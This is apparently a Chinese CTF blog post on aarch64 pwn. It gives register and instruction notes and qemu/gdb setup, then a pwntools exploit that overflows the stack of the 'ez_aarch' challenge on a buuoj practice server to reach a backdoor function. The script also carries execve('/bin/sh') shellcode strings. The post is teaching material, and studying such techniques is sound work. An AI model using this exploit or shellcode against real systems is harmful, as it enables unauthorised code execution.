---
title: arm异构总结
date: 2022-04-15 22:54:59 +0800
categories:
  - 漏洞利用总结
tags:
  - pwn
  - ctf
permalink: /posts/id=11/
pin: false
published:
---
参考文章：

[ ARM架构的pwn题详解___lifanxin的博客](https://blog.csdn.net/A951860555/article/details/116780827)

## Arm/aarch64

aarch64寄存器

| 寄存器  | 位数  | 描述                                                         |
| ------- | :---: | :----------------------------------------------------------- |
| x0-x30  | 64bit | 通用寄存器，如果有需要可以当做32bit使用：WO-W30              |
| FP(x29) | 64bit | 保存栈帧地址(栈底指针)                                       |
| LR(x30) | 64bit | 通常称X30为程序链接寄存器，保存子程序结束后需要执行的下一条指令，**类ret** |
| SP      | 64bit | 保存栈指针,使用 SP/WSP来进行对SP寄存器的访问。               |
| PC      | 64bit | 程序计数器，俗称PC指针，总是指向即将要执行的下一条指令,在arm64中，软件是不能改写PC寄存器的。 |
| CPSR    | 64bit | 状态寄存器                                                   |

![img](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/1117042-e3fabfec65c187f5.png)

```
MOV    X1，X0         ;将寄存器X0的值传送到寄存器X1
ADD    X0，X1，X2     ;寄存器X1和X2的值相加后传送到X0
SUB    X0，X1，X2     ;寄存器X1和X2的值相减后传送到X0

AND    X0，X0，#0xF    ; X0的值与0xF相位与后的值传送到X0
ORR    X0，X0，#9      ; X0的值与9相位或后的值传送到X0
EOR    X0，X0，#0xF    ; X0的值与0xF相异或后的值传送到X0

LDR    X5，[X6，#0x08]        ；ld：load; X6寄存器加0x08的和的地址值内的数据传送到X5
LDP  x29, x30, [sp, #0x10]    ; ldp :load pair ; 一对寄存器, 从内存读取数据到寄存器

STR X0, [SP, #0x8]         ；st:store,str:往内存中写数据（偏移值为正）; X0寄存器的数据传送到SP+0x8地址值指向的存储空间
STUR   w0, [x29, #-0x8]   ;往内存中写数据（偏移值为负）
STP  x29, x30, [sp, #0x10]    ;store pair，存放一对数据, 入栈指令

CBZ  ;比较（Compare），如果结果为零（Zero）就转移（只能跳到后面的指令）
CBNZ ;比较，如果结果非零（Non Zero）就转移（只能跳到后面的指令）
CMP  ;比较指令，相当于SUBS，影响程序状态寄存器CPSR 

B   ;跳转指令，可带条件跳转与cmp配合使用
BL  ;带返回的跳转指令， 返回地址保存到LR（X30）
BLR  ; 带返回的跳转指令，跳转到指令后边跟随寄存器中保存的地址(例：blr    x8 ;跳转到x8保存的地址中去执行)
RET   ;子程序返回指令，返回地址默认保存在LR（X30）
```

详细的汇编建议看这篇[(12条消息) 关于ARM处理器指令集_朽木自雕i的博客-CSDN博客_arm处理器指令](https://blog.csdn.net/qq_45385706/article/details/108478867)

## 做题脚本(以ciscn2021channel为例)

静态编译直接运行

```bash
$ qemu-arm prog
```

动态编译可以用脚本配置

```bash
# pwnarm.sh
$ mkdir lib
$ mv ld-2.31.so ./lib/ld-linux-aarch64.so.1
$ mv libc-2.31.so ./lib/libc.so.6
$ ./qemu-aarch64-static -L ./ ./channel
```

```bash
# dbg
$ file channel
$ set architecture aarch64
$ target remote localhost:1236
```

运行exp后，开新终端使用gdb-multiarch -x dbg

## ez_aarch(aarch64)

![image-20220521214823484](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220521214823484.png)

![image-20220521214918961](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220521214918961.png)

![image-20220521214932381](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220521214932381.png)

题目有后门函数，直接栈溢出覆盖ret

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='aarch64', os='linux')
context.log_level = 'debug'
p=remote("node4.buuoj.cn","26246")
# p = process("qemu-aarch64 -L /usr/aarch64-linux-gnu/ ./stack".split())
# p = process("qemu-aarch64 -L /usr/aarch64-linux-gnu/ -g 1236 ./stack".split())
elf = ELF("./stack")
# libc = elf.libc

def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
system = 0x400000093c

sla("Please leave your name:",'a'*0x28+p64(system))
p.interactive()
```

## channel(UAF)

[2021ciscn pwn/misc 复现](https://blog.e4l4.com/posts/ciscn_2021复现/#channelarm架构堆uaf)